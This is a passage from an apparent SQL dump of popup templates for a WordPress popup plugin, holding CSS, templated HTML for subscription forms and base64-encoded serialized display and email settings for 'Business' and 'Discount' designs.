{\r\n\r\n  -webkit-transition: opacity .5s ease,background-color .5s ease;\r\n  transition: opacity .5s ease,background-color .5s ease;\r\n  border-radius: 5px;\r\n  -moz-border-radius: 5px;\r\n  -webkit-border-radius: 5px;\r\n  border: none;\r\n  width: 100%;\r\n  height: 40px;\r\n  color: #fff;\r\n  font-size: 16px;\r\n  font-family: Comic Sans, Comic Sans MS, cursive;\r\n [if bg_type_1 == \'color\']\r\n  	background: [bg_color_1] 100%;\r\n  [elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  padding: 11px 0 10px;\r\n  text-align: center;\r\n  cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n   box-shadow: 4px 4px 0px rgba(0, 0, 0, 0.1) inset;\r\n	\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n	float: left;\r\n  	width: 90%;\r\n	font-family: \'PT Serif\', serif;\r\n  	color: #000000;\r\n  	font-size: 15px;\r\n  	line-height: 22px;\r\n  	display: block;\r\n    padding: 0px 20px 0px 20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 p{font-family:Comic Sans, Comic Sans MS, cursive;}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n	top: 15px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #585858;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSm{\r\n	margin-top:20px;\r\n}','BestOfCollection.png',1,1,1,1,0,0,0,'2015-01-10 17:59:43',22,0),(19,'Business',1,0,'YTozOntzOjQ6Im1haW4iO2E6MjE6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6Nzoic2hvd190byI7czo4OiJldmVyeW9uZSI7czoyOToic2hvd190b19maXJzdF90aW1lX3Zpc2l0X2RheXMiO3M6MjoiMzAiO3M6MzA6InNob3dfdG9fdW50aWxfbWFrZV9hY3Rpb25fZGF5cyI7czoyOiIzMCI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjt9czozOiJ0cGwiO2E6ODE6e3M6NToid2lkdGgiO3M6MzoiOTUwIjtzOjEzOiJ3aWR0aF9tZWFzdXJlIjtzOjI6InB4IjtzOjE4OiJiZ19vdmVybGF5X29wYWNpdHkiO3M6MzoiMC41IjtzOjk6ImJnX3R5cGVfMCI7czozOiJpbWciO3M6ODoiYmdfaW1nXzAiO3M6NTA6IltQUFNfQVNTRVRTX1VSTF1pbWcvYXNzZXRzL2J1c3NpbmVzLWJhY2tncm91bmQuanBnIjtzOjEwOiJiZ19jb2xvcl8wIjtzOjc6IiMyMzIzMjMiO3M6OToiYmdfdHlwZV8xIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18xIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMSI7czo3OiIjMmIyYTI5IjtzOjk6ImJnX3R5cGVfMiI7czozOiJpbWciO3M6ODoiYmdfaW1nXzIiO3M6MzU6IltQUFNfQVNTRVRTX1VSTF1pbWcvYXNzZXRzL2xhbXAucG5nIjtzOjEwOiJiZ19jb2xvcl8yIjtzOjA6IiI7czoxMDoiZm9udF9sYWJlbCI7czo3OiJkZWZhdWx0IjtzOjE2OiJsYWJlbF9mb250X2NvbG9yIjtzOjc6IiMwMDAwMDAiO3M6MTA6ImZvbnRfdHh0XzAiO3M6NzoiZGVmYXVsdCI7czoxNzoidGV4dF9mb250X2NvbG9yXzAiO3M6NzoiIzAwMDAwMCI7czoxMDoiZm9udF90eHRfMSI7czo3OiJkZWZhdWx0IjtzOjE3OiJ0ZXh0X2ZvbnRfY29sb3JfMSI7czo3OiIjMDAwMDAwIjtzOjExOiJmb250X2Zvb3RlciI7czo3OiJkZWZhdWx0IjtzOjE3OiJmb290ZXJfZm9udF9jb2xvciI7czo3OiIjMDAwMDAwIjtzOjk6ImNsb3NlX2J0biI7czoxMToiY2xhc3N5X2dyZXkiO3M6NzoiYnVsbGV0cyI7czoxMToibGlzdHNfZ3JlZW4iO3M6MTE6ImxheWVyZWRfcG9zIjtzOjM6InRvcCI7czo5OiJlbmJfbGFiZWwiO3M6MToiMSI7czo1OiJsYWJlbCI7czoyMjoiU3Vic2NyaWJlIGFuZCBHZXQgTmV3cyI7czo5OiJlbmJfdHh0XzAiO3M6MToiMSI7czo5OiJlbmJfdHh0XzEiO3M6MToiMSI7czo5OiJmb290X25vdGUiO3M6MTE4OiJXZSByZXNwZWN0IHlvdXIgcHJpdmFjeS4gWW91ciBpbmZvcm1hdGlvbiB3aWxsIG5vdCBiZSBzaGFyZWQgd2l0aCBhbnkgdGhpcmQgcGFydHkgYW5kIHlvdSBjYW4gdW5zdWJzY3JpYmUgYXQgYW55IHRpbWUgIjtzOjE1OiJlbmJfc21fZmFjZWJvb2siO3M6MToiMSI7czoxNzoiZW5iX3NtX2dvb2dsZXBsdXMiO3M6MToiMSI7czoxNDoiZW5iX3NtX3R3aXR0ZXIiO3M6MToiMSI7czo5OiJzbV9kZXNpZ24iO3M6Njoic2ltcGxlIjtzOjg6ImFuaW1fa2V5IjtzOjQ6Im5vbmUiO3M6MTM6ImFuaW1fZHVyYXRpb24iO3M6MDoiIjtzOjEzOiJlbmJfc3Vic2NyaWJlIjtzOjE6IjEiO3M6ODoic3ViX2Rlc3QiO3M6OToid29yZHByZXNzIjtzOjIzOiJzdWJfd3BfY3JlYXRlX3VzZXJfcm9sZSI7czoxMDoic3Vic2NyaWJlciI7czoxOToic3ViX2F3ZWJlcl9saXN0bmFtZSI7czowOiIiO3M6MjE6InN1Yl9hd2ViZXJfYWR0cmFja2luZyI7czowOiIiO3M6MjE6InN1Yl9tYWlsY2hpbXBfYXBpX2tleSI7czowOiIiO3M6MTQ6InN1Yl9ncl9hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX2FjX2FwaV91cmwiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX2tleSI7czowOiIiO3M6MTg6InN1Yl9hcl9mb3JtX2FjdGlvbiI7czowOiIiO3M6MTA6InN1Yl9zZ2FfaWQiO3M6MDoiIjtzOjE1OiJzdWJfc2dhX2xpc3RfaWQiO3M6MDoiIjtzOjIxOiJzdWJfc2dhX2FjdGl2YXRlX2NvZGUiO3M6MDoiIjtzOjEwOiJzdWJfZmllbGRzIjthOjI6e3M6NDoibmFtZSI7YTo3OntzOjM6ImVuYiI7czoxOiIxIjtzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NDoiTmFtZSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO31zOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fX1zOjIwOiJzdWJfdHh0X2NvbmZpcm1fc2VudCI7czo2NzoiQ29uZmlybWF0aW9uIGxpbmsgd2FzIHNlbnQgdG8geW91ciBlbWFpbCBhZGRyZXNzLiBDaGVjayB5b3VyIGVtYWlsISI7czoxNToic3ViX3R4dF9zdWNjZXNzIjtzOjI0OiJUaGFuayB5b3UgZm9yIHN1YnNjcmliZSEiO3M6MjE6InN1Yl90eHRfaW52YWxpZF9lbWFpbCI7czoyMjoiRW1wdHkgb3IgaW52YWxpZCBlbWFpbCI7czoxNjoic3ViX3JlZGlyZWN0X3VybCI7czowOiIiO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6MzQ6IkNvbmZpcm0gc3Vic2NyaXB0aW9uIG9uIFtzaXRlbmFtZV0iO3M6MjU6InN1Yl90eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjE5NzoiWW91IHN1YnNjcmliZWQgb24gc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uIEZvbGxvdyA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+IHRvIGNvbXBsZXRlIHlvdXIgc3Vic2NyaXB0aW9uLiBJZiB5b3UgZGlkIG5vdCBzdWJzY3JpYmUgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoyNToic3ViX3JlZGlyZWN0X2VtYWlsX2V4aXN0cyI7czowOiIiO3M6MTM6InN1Yl9idG5fbGFiZWwiO3M6NjoiU3VibWl0IjtzOjEzOiJzdWJfbmV3X2VtYWlsIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoxNToic3ViX25ld19tZXNzYWdlIjtzOjEyOToiWW91IGhhdmUgbmV3IHN1YnNjcmliZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSB1cyBzdWJzY3JpYmVyIGluZm9ybWF0aW9uOjxiciAvPltzdWJzY3JpYmVyX2RhdGFdIjtzOjE4OiJsb2dpbl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjE1OiJsb2dpbl9idG5fbGFiZWwiO3M6NToiTG9naW4iO3M6MTY6InJlZ19yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjIzOiJyZWdfd3BfY3JlYXRlX3VzZXJfcm9sZSI7czoxMDoic3Vic2NyaWJlciI7czoxMzoicmVnX2J0bl9sYWJlbCI7czo4OiJSZWdpc3RlciI7czoxMDoicmVnX2ZpZWxkcyI7YToyOntzOjQ6Im5hbWUiO2E6Nzp7czozOiJlbmIiO3M6MToiMSI7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjQ6Ik5hbWUiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6IkUtTWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5iIjtzOjE6IjEiO319czoyMDoicmVnX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InJlZ190eHRfc3VjY2VzcyI7czoyNzoiVGhhbmsgeW91IGZvciByZWdpc3RyYXRpb24hIjtzOjIxOiJyZWdfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6Mjg6InJlZ190eHRfY29uZmlybV9tYWlsX3N1YmplY3QiO3M6MzQ6IkNvbmZpcm0gcmVnaXN0cmF0aW9uIG9uIFtzaXRlbmFtZV0iO3M6MjU6InJlZ190eHRfY29uZmlybV9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9tZXNzYWdlIjtzOjE5NjoiWW91IHJlZ2lzdGVyZWQgb24gc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uIEZvbGxvdyA8YSBocmVmPVwiW2NvbmZpcm1fbGlua11cIj50aGlzIGxpbms8L2E+IHRvIGNvbXBsZXRlIHlvdXIgcmVnaXN0cmF0aW9uLiBJZiB5b3UgZGlkIG5vdCByZWdpc3RlciBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoicmVnX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjEzOiJyZWdfbmV3X2VtYWlsIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoxNToicmVnX25ld19tZXNzYWdlIjtzOjEyMToiWW91IGhhdmUgbmV3IG1lbWJlciBvbiB5b3VyIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LCBoZXJlIHVzIG1lbWJlciBpbmZvcm1hdGlvbjo8YnIgLz5bc3Vic2NyaWJlcl9kYXRhXSI7czo1OiJ0eHRfMCI7czoxNzM6IjxwPlBvcHVwIGJ5IFN1cHN5c3RpYyBsZXRzIHlvdSBlYXNpbHkgY3JlYXRlIGVsZWdhbnQgb3ZlcmxhcHBpbmcgd2luZG93cyB3aXRoIHVubGltaXRlZCBmZWF0dXJlcy4gUG9wLXVwcyB3aXRoIFNsaWRlciwgTGlnaHRib3gsIENvbnRhY3QgYW5kIFN1YnNjcmlwdGlvbiBmb3JtcyBhbmQgbW9yZS48L3A+IjtzOjU6InR4dF8xIjtzOjIwOiI8cD5Zb3VyIEJ1c2luZXNzPC9wPiI7fXM6MTA6Im9wdHNfYXR0cnMiO2E6Mjp7czo5OiJiZ19udW1iZXIiO3M6MToiMyI7czoxNjoidHh0X2Jsb2NrX251bWJlciI7czoxOiIyIjt9fQ==','<link rel=\"stylesheet\" type=\"text/css\" href=\"//fonts.googleapis.com/css?family=Dancing+Script\" />\r\n<link rel=\"stylesheet\" type=\"text/css\" href=\"//fonts.googleapis.com/css?family=Didact+Gothic\" />\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"ppsRightCol\">\r\n				[if enb_txt_1]\r\n					<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_1 ppsPopupTxt_1\">\r\n					[txt_1]\r\n					</div>\r\n				[endif]\r\n				<div class=\"logo\">\r\n              		[if bg_type_2 == \'img\']\r\n                  		<img src=\"[bg_img_2]\" />\r\n                  	[endif]\r\n              	</div>\r\n				[if enb_label]\r\n					<div class=\"label-window\">\r\n						<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n					</div>\r\n				[endif]\r\n				[if enb_txt_0]\r\n					<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n					[txt_0]\r\n					</div>\r\n				[endif]\r\n				<div style=\"clear: both;\"></div>\r\n				[if enb_subscribe]\r\n					<div class=\"ppsSubscribeShell\">\r\n						[sub_form_start]\r\n						[sub_fields_html]\r\n						<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n						[sub_form_end]\r\n						<div style=\"clear: both;\"></div>\r\n					</div>\r\n				[endif]\r\n				[if enb_sm]\r\n					<div class=\"ppsSm\">\r\n					[sm_html]\r\n					</div>\r\n				[endif]\r\n				[if enb_foot_note]\r\n					<div class=\"ppsFootNote\">\r\n					[foot_note]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: Georgia, Times, serif;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	display: table;\r\n  [if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 50%;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .label-window{\r\n    width: 100%;\r\n    padding-top: 10px;\r\n    padding-bottom: 10px;\r\n    margin-top: 20px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #000;\r\n	font-family: \'Dancing Script\';\r\n	font-size: 56px;\r\n	font-weight: 100;\r\n	color: #000;\r\n	text-shadow: #000000 1px 1px 1px;\r\n	\r\n	padding-left: 20px;\r\n  	text-align:center;\r\n  	line-height: 1em;\r\n}\r\n#ppsPopupShell_[ID] .ppsRightCol {\r\n	/*display: table-cell;*/\r\n  	float:right;\r\n  	width: 40%;\r\n  	border-radius:20px;\r\n  	height: 100%;\r\n  	margin-bottom: 30px;\r\n  	margin-right: 30px;\r\n  	margin-top: 65px;\r\n  	background-color: #ebecec;\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsRightCol .logo{\r\n  	display: block;\r\n    width: 100%;\r\n  	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsRightCol .logo img {\r\n	max-height: 220px;\r\n  	width: auto;\r\n  	max-width: 100%;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 1px 30px 0;\r\n	text-align: right;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: none;\r\n  	border-radius: 3px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n  	padding-left: 10px;\r\n  	font-size: 17px;\r\n  	color: #000;\r\n  	border: 1px solid #928C8C;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	font-size: 17px;\r\n  	color: #fff;\r\n  	border-top-right-radius: 3px;\r\n  	border-bottom-right-radius: 3px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border-color: #000;\r\n  	font-family: \'Open Sans\', arial;\r\n	font-weight: 100;\r\n	color: #ffffff;\r\n  	width: 104%;\r\n	text-shadow: #000000 1px 1px 1px;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: [bg_color_1];\r\n    background: -moz-linear-gradient(90deg, [bg_color_2] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n    background: -webkit-linear-gradient(270deg, [bg_color_2] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n    background: -o-linear-gradient(270deg, [bg_color_2] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n    background: -ms-linear-gradient(270deg, [bg_color_2] 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n    background: linear-gradient(0deg, [bg_color_2]) 0%, {{ adjust_brightness(popup.params.tpl.bg_color_2, 100) }} 63%);\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n  	\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	box-shadow: inset 1px 1px 3px #666;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	text-align: center;\r\n  	font-family: \'Didact Gothic\';\r\n 	font-weight: 100;\r\n	color: #000;\r\n  	font-size: 18px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	margin: 2px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupTxt_1 {\r\n  	text-align: center;\r\n  	font-family: \'Didact Gothic\';\r\n 	font-weight: 100;\r\n	color: #000;\r\n  	font-size: 24px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupTxt_1 {\r\n  	margin: 20px 0px 20px 0px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #585858;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}','bussines.png',1,1,1,1,0,0,0,'2015-01-10 17:59:43',18,0),(20,'Discount',1,0,'YTozOntzOjQ6Im1haW4iO2E6MTc6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNzoic2hvd19vbl9zY3JvbGxfd2luZG93X2RlbGF5IjtzOjE6IjAiO3M6MzM6InNob3dfb25fc2Nyb2xsX3dpbmRvd19wZXJjX3Njcm9sbCI7czoxOiIwIjtzOjI4OiJzaG93X29uX2FmdGVyX2luYWN0aXZlX3ZhbHVlIjtzOjI6IjEwIjtzOjg6ImNsb3NlX29uIjtzOjEwOiJ1c2VyX2Nsb3NlIjtzOjI1OiJjbG9zZV9vbl9hZnRlcl90aW1lX3ZhbHVlIjtzOjE6IjUiO3M6MTA6InNob3dfcGFnZXMiO3M6MzoiYWxsIjtzOjc6InNob3dfdG8iO3M6ODoiZXZlcnlvbmUiO3M6Mjk6InNob3dfdG9fZmlyc3RfdGltZV92aXNpdF9kYXlzIjtzOjI6IjMwIjtzOjMwOiJzaG93X3RvX3VudGlsX21ha2VfYWN0aW9uX2RheXMiO3M6MjoiMzAiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjY2OntzOjU6IndpZHRoIjtzOjM6IjUwMCI7czoxMzoid2lkdGhfbWVhc3VyZSI7czoyOiJweCI7czoxODoiYmdfb3ZlcmxheV9vcGFjaXR5IjtzOjM6IjAuNSI7czo5OiJiZ190eXBlXzAiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzAiO3M6Mzc6IltQUFNfQVNTRVRTX1VSTF1pbWcvYXNzZXRzL25hdHVyZS5qcGciO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiIzU4NTU3MCI7czo5OiJiZ190eXBlXzEiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzEiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjc6IiM0MmM1YmYiO3M6OToiYmdfdHlwZV8yIjtzOjM6ImltZyI7czo4OiJiZ19pbWdfMiI7czo0MToiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvbWFpbC13aGl0ZS5wbmciO3M6MTA6ImJnX2NvbG9yXzIiO3M6MDoiIjtzOjk6